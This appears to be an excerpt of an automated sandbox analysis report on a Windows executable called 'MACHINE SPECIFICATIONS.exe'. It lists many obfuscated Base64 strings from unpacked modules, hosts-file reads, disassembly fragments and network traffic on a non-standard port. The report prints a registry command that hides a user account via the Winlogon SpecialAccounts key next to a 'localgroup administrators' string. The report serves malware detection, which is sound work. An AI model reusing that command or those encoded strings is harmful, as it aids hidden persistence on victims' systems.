'SWxjZGEldXNpfWN4eGRtfDB4YTN1Y3d+dHh4d3k9eHBSARAXBEdWVwh7bWkMRENOV1RBE1tbWk4Z', 'Q25ubHYlYG5kfW95ZWNpL3NwfDN2cDZ2aGl2cnl5PmtPARAXBEdWVwh7bWkMRENOV1RBE1tbWk4Z', 'RXRhb21hY2ZmKWlkYGJ8L3Z4fmdxZ395fzl5enI9fHoAQFJTSExDQwhdRQseGQ5NQEESYXN3Fl5VWF1eTx1RUSw4Yw==', 'Q2ljbWpganQob2NneGh8Zn52MnB1ezZ1fTl7a2xxd3pEAVZMBBcSB0pZWgt+amwPWVxTVFFGFlhWVUMa', 'QnNrZGxxaGJ7eipqaGd7fGR8d31gNWNkcXd9O1ROUj9DTk5MVgVVV0lKTwtFXg5ORlBbX1VXWlIYX1VJHA8KHyIxMmMWAgRnISQrLCk+biA+PSty', 'Q25sd3ZkdXMoaG5heX56YnV/ZjNhZn95fzlSSFA9fXBMTlADV1VHRE0JQ1gMTFhOWV1TUVhQFlFXSxoJCB1cTzBhEAQGZS8qKS4vOGwiICMpcA==', 'U2B2dnZkcm5nZypqaGd7fGR8d31gNWNkcXd9O1ROUj9DTk5MVgVVV0lKTwtFXg5ORlBbX1VXWlIYX1VJHA8KHyIxMmMWAgRnISQrLCk+biA+PSty', 'SFJOI2JsanNte2Nlay1nfDBwZHJ9eXd1dHw6fXNvPi0UAUBTVAV0YGoJQ0ZNSktcEF5cX00U', 'SHRnI2lqYm5uYG95LGR9L3Fnc3p4dHR7fTl8dG49LCsAQ1JTBHdhZQhAR0pLSF0PX19eShU=', 'U253cWdgJndhcW9nLGthfX1wZjN9ZjZ5d206aGltbnBSVUdHBEdfB1xBTwtKREJbVUMc', 'VGlnI2JsanNteypqb25rf2RiMnx6eW83IDl7dXg9LykAQ1JTBEJURlFaSUpASA5GXVBVVkcVUFhKGUpJU15bTDMoLCRlZR8oPWk5IyM4IitwNzshJyF2NDc3LD4uKX4rCARCCgkEAQJIHQVLCx8PFgMSEx8RVQMEERcdWzkbGBrj9fGuusL05vH66erg6KA=', 'VGlnI2JsanNteypqb25rf2RiMnx6eW83IDl4a2w9eW1BWFFARUlDB0FES0xJXg5JX0MSQ0ZaVVJLSlNVWxweZi80YjAsKjMrLGksIj4+Om8zPjwlMScidywxP3s1MD84BUEWDEQCFAYRGgkKAAhOGgMYHBRUMBARHRoOCFFDOQ3h+PHg5enjqQ==', 'VGlnI2JsanNteypqb25rf2RiMnx6eW83IDl4a2w9eW1BWFFARUlDB0FES0xJXg5JX0MSQ0ZaVVJLSlNVWxweZi80YjAsKjMrLGksIj4+Om8zPjwlMScidywxP3s1MD84BUEWDEQCFAYRGgkKAAhOGgMYHBRUMBARHRoOCFFDOQ3h+PHg5enjqQ==', 'VGlnI2JsanNteypqb25rf2RiMnx6eW83IDl4a2w9eW1BWFFARUlDB0FES0xJXg5JX0MSQ0ZaVVJLSlNVWxweZi80YjAsKjMrLGksIj4+Om8zPjwlMScidywxP3s1MD84BUEWDEQCFAYRGgkKAAhOGgMYHBRUMBARHRoOCFFDOQ3h+PHg5enjqQ==', 'VGlnI2JsanNteypqb25rf2RiMnx6eW83IDl4a2w9eW1BWFFARUlDB0FES0xJXg5JX0MSQ0ZaVVJLSlNVWxweZi80YjAsKjMrLGksIj4+Om8zPjwlMScidywxP3s1MD84BUEWDEQCFAYRGgkKAAhOGgMYHBRUMBARHRoOCFFDOQ3h+PHg5enjqQ==', 'VGlnI2JsanNteypqb25rf2RiMnx6eW83IDl4a2w9eW1BWFFARUlDB0FES0xJXg5JX0MSQ0ZaVVJLSlNVWxweZi80YjAsKjMrLGksIj4+Om8zPjwlMScidywxP3s1MD84BUEWDEQCFAYRGgkKAAhOGgMYHBRUMBARHRoOCFFDOQ3h+PHg5enjqQ==', 'VGlnI2JsanNteypqb25rf2RiMnx6eW83IDl4a2w9eW1BWFFARUlDB0FES0xJXg5JX0MSQ0ZaVVJLSlNVWxw
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.f80000.3.unpack, E6ou21sp/mtEC31vu.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.f80000.3.unpack, E6ou21sp/y78voWXF.csBase64 encoded string: 'SW9hbHZ3Y2R8KVhMTi14bnxkdzNxe2Jyanx+Nzxwa2xUAUBGBBULFR0cCw=='
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.f80000.0.unpack, E6ou21sp/AC5KZsZF.csBase64 encoded string: 'SW9hbHZ3Y2R8KVhMTi14bnxkdzNxe2Jyanx+Nzxwa2xUAUBGBBULFR0cCw==', 'VGlnI21oZ2BtKX1iYGEubXUxYXtmfHh8fX06eWU9bHpNTlRKSkIGV0FRT0dfDVlGRFkSQERQVV5eUF9fHF5RUy8zYiU2KitnIT1tOGwvIT00NCAgeg=='
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.f80000.0.unpack, E6ou21sp/u0033Cv8rtWX.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.f80000.0.unpack, E6ou21sp/vmpGX47v.csBase64 encoded string: 'SWxjZGElfGhnZCpmeX56L3J0MnFxYWFyfXc6Kiw9f3FEARcTFAAGBg==', 'QW1uI1dwdndne35uaC1IYGJ8c2dnaTw5cml9IDYzdG9FRhkJCkdLVxMDBExFSxUFHkFcVA8fGENRXwEREklXWSY9CBMBAmZqaAMlIiI5bh84PiY8Myc3JzAwOXsZJS46EhURQyMXCRIYFUBFBh0JVFpfGAMREgo1NSlaVlwqFxHk7vXwpMfv8+Xo+vemo+zi4O3V2tK1u7fb9vfr6c777dbEguTWxNbPwcrZi+XD2srC0trS2tLTl/7WyNbdycKV7qarpbiViIDo5Oqbo7+6rrK9t/OasKKgt6ux+5uvv6+IiIGQmM/Il4aOlr+lq6jP3dGmkpOSk5PYsJeam5jeuWltZyNCanRqaX12ISJ5Z2krOzxnfXNwa1l1djtadHJ6UwEKCQoPD1sCBwA=', 'QW1uI1dwdndne35uaC1IYGJ8c2dnaTw5cml9IDYzdG9FRhkJCkdLVxMDBExFSxUFHkFcVA8fGENRXwEREklXWSY9CBMBAmZqaAMlIiI5bh84PiY8Myc3JzAwOXsZJS46EhURQyMXCRIYFUBFBh0JVFpfGAMREgo1NSlaVlwqFxHk7vXwpMfv8+Xo+vemo+zi4O3V2tK1u7fb9vfr6c777dbEguTWxNbPwcrZi+XD2srC0trS2tLTl/7WyNbdycKV7qarpbiViIDo5Oqbo7+6rrK9t/OasKKgt6ux+5uvv6+IiIGQmM/Il4aOlr+lq6jP3dGmkpOSk5PYsJeam5jeuWltZyNCanRqaX12ISJ5Z2krOzxnfXNwa1l1djtadHJ6UwEKCQoPD1sCBwA=', 'SWxjZGEldXNpfWN4eGRtfDB4YTN1Y3d+dHh4d3k9eHBSARAXBEdWVwh7bWkMRENOV1RBE1tbWk4Z', 'Q25ubHYlYG5kfW95ZWNpL3NwfDN2cDZ2aGl2cnl5PmtPARAXBEdWVwh7bWkMRENOV1RBE1tbWk4Z', 'RXRhb21hY2ZmKWlkYGJ8L3Z4fmdxZ395fzl5enI9fHoAQFJTSExDQwhdRQseGQ5NQEESYXN3Fl5VWF1eTx1RUSw4Yw==', 'Q2ljbWpganQob2NneGh8Zn52MnB1ezZ1fTl7a2xxd3pEAVZMBBcSB0pZWgt+amwPWVxTVFFGFlhWVUMa', 'QnNrZGxxaGJ7eipqaGd7fGR8d31gNWNkcXd9O1ROUj9DTk5MVgVVV0lKTwtFXg5ORlBbX1VXWlIYX1VJHA8KHyIxMmMWAgRnISQrLCk+biA+PSty', 'Q25sd3ZkdXMoaG5heX56YnV/ZjNhZn95fzlSSFA9fXBMTlADV1VHRE0JQ1gMTFhOWV1TUVhQFlFXSxoJCB1cTzBhEAQGZS8qKS4vOGwiICMpcA==', 'U2B2dnZkcm5nZypqaGd7fGR8d31gNWNkcXd9O1ROUj9DTk5MVgVVV0lKTwtFXg5ORlBbX1VXWlIYX1VJHA8KHyIxMmMWAgRnISQrLCk+biA+PSty', 'SFJOI2JsanNte2Nlay1nfDBwZHJ9eXd1dHw6fXNvPi0UAUBTVAV0YGoJQ0ZNSktcEF5cX00U', 'SHRnI2lqYm5uYG95LGR9L3Fnc3p4dHR7fTl8dG49LCsAQ1JTBHdhZQhAR0pLSF0PX19eShU=', 'U253cWdgJndhcW9nLGthfX1wZjN9ZjZ5d206aGltbnBSVUdHBEdfB1xBTwtKREJbVUMc', 'VGlnI2JsanNteypqb25rf2RiMnx6eW83IDl7dXg9LykAQ1JTBEJURlFaSUpASA5GXVBVVkcVUFhKGUpJU15bTDMoLCRlZR8oPWk5IyM4IitwNzshJyF2NDc3LD4uKX4rCARCCgkEAQJIHQVLCx8PFgMSEx8RVQMEERcdWzkbGBrj9fGuusL05vH66erg6KA=', 'VGlnI2JsanNteypqb25rf2RiMnx6eW83IDl4a2w9eW1BWFFARUlDB0FES0xJXg5JX0MSQ0ZaVVJLSlNVWxweZi80YjAsKjMrLGksIj4+Om8zPjwlMScidywxP3s1MD84BUEWDEQCFAYRGgkKAAhOGgMYHBRUMBARHRoOCFFDOQ3h+PHg5enjqQ==', 'VGlnI2JsanNteypqb25rf2RiMnx6eW83IDl4a2w9eW1BWFFARUlDB0FES0xJXg5JX0MSQ0ZaVVJLSlNVWxweZi80YjAsKjMrLGksIj4+Om8zPjwlMScidywxP3s1MD84BUEWDEQCFAYRGgkKAAhOGgMYHBRUMBARHRoOCFFDOQ3h+PHg5enjqQ==', 'VGlnI2JsanNteypqb25rf2RiMnx6eW83IDl4a2w9eW1BWFFARUlDB0FES0xJXg5JX0MSQ0ZaVVJLSlNVWxweZi80YjAsKjMrLGksIj4+Om8zPjwlMScidywxP3s1MD84BUEWDEQCFAYRGgkKAAhOGgMYHBRUMBARHRoOCFFDOQ3h+PHg5enjqQ==', 'VGlnI2JsanNteypqb25rf2RiMnx6eW83IDl4a2w9eW1BWFFARUlDB0FES0xJXg5JX0MSQ0ZaVVJLSlNVWxweZi80YjAsKjMrLGksIj4+Om8zPjwlMScidywxP3s1MD84BUEWDEQCFAYRGgkKAAhOGgMYHBRUMBARHRoOCFFDOQ3h+PHg5enjqQ==', 'VGlnI2JsanNteypqb25rf2RiMnx6eW83IDl4a2w9eW1BWFFARUlDB0FES0xJXg5JX0MSQ0ZaVVJLSlNVWxweZi80YjAsKjMrLGksIj4+Om8zPjwlMScidywxP3s1MD84BUEWDEQCFAYRGgkKAAhOGgMYHBRUMBARHRoOCFFDOQ3h+PHg5enjqQ==', 'VGlnI2JsanNteypqb25rf2RiMnx6eW83IDl4a2w9eW1BWFFARUlDB0FES0xJXg5JX0MSQ0ZaVVJLSlNVWxw
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.f80000.0.unpack, E6ou21sp/p34sqIEC.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.f80000.0.unpack, E6ou21sp/uHFmWqpG.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg', 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg', 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg', 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg', 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg', 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.f80000.0.unpack, E6ou21sp/u0039u7HvIWG.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.f80000.0.unpack, E6ou21sp/D5Gq3JZC.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.f80000.0.unpack, E6ou21sp/y78voWXF.csBase64 encoded string: 'SW9hbHZ3Y2R8KVhMTi14bnxkdzNxe2Jyanx+Nzxwa2xUAUBGBBULFR0cCw=='
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.f80000.0.unpack, E6ou21sp/rKssIt3o.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.f80000.0.unpack, E6ou21sp/omA5CsZE.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.f80000.0.unpack, E6ou21sp/mtEC31vu.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.f80000.0.unpack, E6ou21sp/v9AX5C4E.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.f80000.0.unpack, E6ou21sp/uA1ItnCm.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.f80000.2.unpack, E6ou21sp/p34sqIEC.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.f80000.2.unpack, E6ou21sp/uHFmWqpG.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg', 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg', 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg', 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg', 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg', 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.f80000.2.unpack, E6ou21sp/u0039u7HvIWG.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.f80000.2.unpack, E6ou21sp/D5Gq3JZC.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.f80000.2.unpack, E6ou21sp/y78voWXF.csBase64 encoded string: 'SW9hbHZ3Y2R8KVhMTi14bnxkdzNxe2Jyanx+Nzxwa2xUAUBGBBULFR0cCw=='
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.f80000.2.unpack, E6ou21sp/AC5KZsZF.csBase64 encoded string: 'SW9hbHZ3Y2R8KVhMTi14bnxkdzNxe2Jyanx+Nzxwa2xUAUBGBBULFR0cCw==', 'VGlnI21oZ2BtKX1iYGEubXUxYXtmfHh8fX06eWU9bHpNTlRKSkIGV0FRT0dfDVlGRFkSQERQVV5eUF9fHF5RUy8zYiU2KitnIT1tOGwvIT00NCAgeg=='
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.f80000.2.unpack, E6ou21sp/u0033Cv8rtWX.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.f80000.2.unpack, E6ou21sp/v9AX5C4E.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.f80000.2.unpack, E6ou21sp/uA1ItnCm.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.f80000.2.unpack, E6ou21sp/rKssIt3o.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.f80000.2.unpack, E6ou21sp/omA5CsZE.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.f80000.2.unpack, E6ou21sp/vmpGX47v.csBase64 encoded string: 'SWxjZGElfGhnZCpmeX56L3J0MnFxYWFyfXc6Kiw9f3FEARcTFAAGBg==', 'QW1uI1dwdndne35uaC1IYGJ8c2dnaTw5cml9IDYzdG9FRhkJCkdLVxMDBExFSxUFHkFcVA8fGENRXwEREklXWSY9CBMBAmZqaAMlIiI5bh84PiY8Myc3JzAwOXsZJS46EhURQyMXCRIYFUBFBh0JVFpfGAMREgo1NSlaVlwqFxHk7vXwpMfv8+Xo+vemo+zi4O3V2tK1u7fb9vfr6c777dbEguTWxNbPwcrZi+XD2srC0trS2tLTl/7WyNbdycKV7qarpbiViIDo5Oqbo7+6rrK9t/OasKKgt6ux+5uvv6+IiIGQmM/Il4aOlr+lq6jP3dGmkpOSk5PYsJeam5jeuWltZyNCanRqaX12ISJ5Z2krOzxnfXNwa1l1djtadHJ6UwEKCQoPD1sCBwA=', 'QW1uI1dwdndne35uaC1IYGJ8c2dnaTw5cml9IDYzdG9FRhkJCkdLVxMDBExFSxUFHkFcVA8fGENRXwEREklXWSY9CBMBAmZqaAMlIiI5bh84PiY8Myc3JzAwOXsZJS46EhURQyMXCRIYFUBFBh0JVFpfGAMREgo1NSlaVlwqFxHk7vXwpMfv8+Xo+vemo+zi4O3V2tK1u7fb9vfr6c777dbEguTWxNbPwcrZi+XD2srC0trS2tLTl/7WyNbdycKV7qarpbiViIDo5Oqbo7+6rrK9t/OasKKgt6ux+5uvv6+IiIGQmM/Il4aOlr+lq6jP3dGmkpOSk5PYsJeam5jeuWltZyNCanRqaX12ISJ5Z2krOzxnfXNwa1l1djtadHJ6UwEKCQoPD1sCBwA=', 'SWxjZGEldXNpfWN4eGRtfDB4YTN1Y3d+dHh4d3k9eHBSARAXBEdWVwh7bWkMRENOV1RBE1tbWk4Z', 'Q25ubHYlYG5kfW95ZWNpL3NwfDN2cDZ2aGl2cnl5PmtPARAXBEdWVwh7bWkMRENOV1RBE1tbWk4Z', 'RXRhb21hY2ZmKWlkYGJ8L3Z4fmdxZ395fzl5enI9fHoAQFJTSExDQwhdRQseGQ5NQEESYXN3Fl5VWF1eTx1RUSw4Yw==', 'Q2ljbWpganQob2NneGh8Zn52MnB1ezZ1fTl7a2xxd3pEAVZMBBcSB0pZWgt+amwPWVxTVFFGFlhWVUMa', 'QnNrZGxxaGJ7eipqaGd7fGR8d31gNWNkcXd9O1ROUj9DTk5MVgVVV0lKTwtFXg5ORlBbX1VXWlIYX1VJHA8KHyIxMmMWAgRnISQrLCk+biA+PSty', 'Q25sd3ZkdXMoaG5heX56YnV/ZjNhZn95fzlSSFA9fXBMTlADV1VHRE0JQ1gMTFhOWV1TUVhQFlFXSxoJCB1cTzBhEAQGZS8qKS4vOGwiICMpcA==', 'U2B2dnZkcm5nZypqaGd7fGR8d31gNWNkcXd9O1ROUj9DTk5MVgVVV0lKTwtFXg5ORlBbX1VXWlIYX1VJHA8KHyIxMmMWAgRnISQrLCk+biA+PSty', 'SFJOI2JsanNte2Nlay1nfDBwZHJ9eXd1dHw6fXNvPi0UAUBTVAV0YGoJQ0ZNSktcEF5cX00U', 'SHRnI2lqYm5uYG95LGR9L3Fnc3p4dHR7fTl8dG49LCsAQ1JTBHdhZQhAR0pLSF0PX19eShU=', 'U253cWdgJndhcW9nLGthfX1wZjN9ZjZ5d206aGltbnBSVUdHBEdfB1xBTwtKREJbVUMc', 'VGlnI2JsanNteypqb25rf2RiMnx6eW83IDl7dXg9LykAQ1JTBEJURlFaSUpASA5GXVBVVkcVUFhKGUpJU15bTDMoLCRlZR8oPWk5IyM4IitwNzshJyF2NDc3LD4uKX4rCARCCgkEAQJIHQVLCx8PFgMSEx8RVQMEERcdWzkbGBrj9fGuusL05vH66erg6KA=', 'VGlnI2JsanNteypqb25rf2RiMnx6eW83IDl4a2w9eW1BWFFARUlDB0FES0xJXg5JX0MSQ0ZaVVJLSlNVWxweZi80YjAsKjMrLGksIj4+Om8zPjwlMScidywxP3s1MD84BUEWDEQCFAYRGgkKAAhOGgMYHBRUMBARHRoOCFFDOQ3h+PHg5enjqQ==', 'VGlnI2JsanNteypqb25rf2RiMnx6eW83IDl4a2w9eW1BWFFARUlDB0FES0xJXg5JX0MSQ0ZaVVJLSlNVWxweZi80YjAsKjMrLGksIj4+Om8zPjwlMScidywxP3s1MD84BUEWDEQCFAYRGgkKAAhOGgMYHBRUMBARHRoOCFFDOQ3h+PHg5enjqQ==', 'VGlnI2JsanNteypqb25rf2RiMnx6eW83IDl4a2w9eW1BWFFARUlDB0FES0xJXg5JX0MSQ0ZaVVJLSlNVWxweZi80YjAsKjMrLGksIj4+Om8zPjwlMScidywxP3s1MD84BUEWDEQCFAYRGgkKAAhOGgMYHBRUMBARHRoOCFFDOQ3h+PHg5enjqQ==', 'VGlnI2JsanNteypqb25rf2RiMnx6eW83IDl4a2w9eW1BWFFARUlDB0FES0xJXg5JX0MSQ0ZaVVJLSlNVWxweZi80YjAsKjMrLGksIj4+Om8zPjwlMScidywxP3s1MD84BUEWDEQCFAYRGgkKAAhOGgMYHBRUMBARHRoOCFFDOQ3h+PHg5enjqQ==', 'VGlnI2JsanNteypqb25rf2RiMnx6eW83IDl4a2w9eW1BWFFARUlDB0FES0xJXg5JX0MSQ0ZaVVJLSlNVWxweZi80YjAsKjMrLGksIj4+Om8zPjwlMScidywxP3s1MD84BUEWDEQCFAYRGgkKAAhOGgMYHBRUMBARHRoOCFFDOQ3h+PHg5enjqQ==', 'VGlnI2JsanNteypqb25rf2RiMnx6eW83IDl4a2w9eW1BWFFARUlDB0FES0xJXg5JX0MSQ0ZaVVJLSlNVWxw
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.f80000.2.unpack, E6ou21sp/mtEC31vu.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6648:120:WilError_01
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                        Source: MACHINE SPECIFICATIONS.exeStatic file information: File size 1190912 > 1048576
                        Source: MACHINE SPECIFICATIONS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                        Source: MACHINE SPECIFICATIONS.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
                        Source: MACHINE SPECIFICATIONS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                        Source: Binary string: E:\A\_work\974\s\artifacts\NuGet.Frameworks\16.0\obj\release\net472\NuGet.Frameworks.pdb source: MACHINE SPECIFICATIONS.exe
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeCode function: 0_2_00FEDC7E push eax; retf 0_2_00FEDC87
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeCode function: 0_2_00FEDCA8 push eax; retf 0_2_00FEDCE0
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeCode function: 0_2_00FEDC88 push eax; retf 0_2_00FEDC87
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeCode function: 0_2_00D9B10A push esp; iretd 0_2_00D9B161
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeCode function: 0_2_00D9D4D8 pushad ; retf 0_2_00D9D4D9
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeCode function: 0_2_00D9C57C pushfd ; ret 0_2_00D9C5D1
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeCode function: 0_2_00D9C538 push esp; ret 0_2_00D9C551
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeCode function: 0_2_00D9AF67 push esp; iretd 0_2_00D9B161
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeCode function: 0_2_00D90F00 push esp; ret 0_2_00D90F01
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeCode function: 1_2_00FEDC7E push eax; retf 1_2_00FEDC87
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeCode function: 1_2_00FEDCA8 push eax; retf 1_2_00FEDCE0
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeCode function: 1_2_00FEDC88 push eax; retf 1_2_00FEDC87
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeCode function: 1_2_016FF8A0 push ecx; ret 1_2_016FF8B2
                        Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exeCode function: 1_2_0580D91B push A405853Eh; retf 1_2_0580D925
                        Source: MACHINE SPECIFICATIONS.exeStatic PE information: 0xD2658D38 [Sat Nov 8 23:37:28 2081 UTC]
                        Source: initial sampleStatic PE information: section name: .text entropy: 7.11216408113

                        Hooking and other Techniques for Hiding and Protection

                        barindex
                        Contains functionality to hide user accounts
                        Source: MACHINE SPECIFICATIONS.exe, 00000000.00000002.280558143.000000000443B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v
                        Source: MACHINE SPECIFICATIONS.exe, 00000000.00000002.280558143.000000000443B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: localgroup administrators aREG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v
                        Uses known network protocols on non-standard ports
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 17910
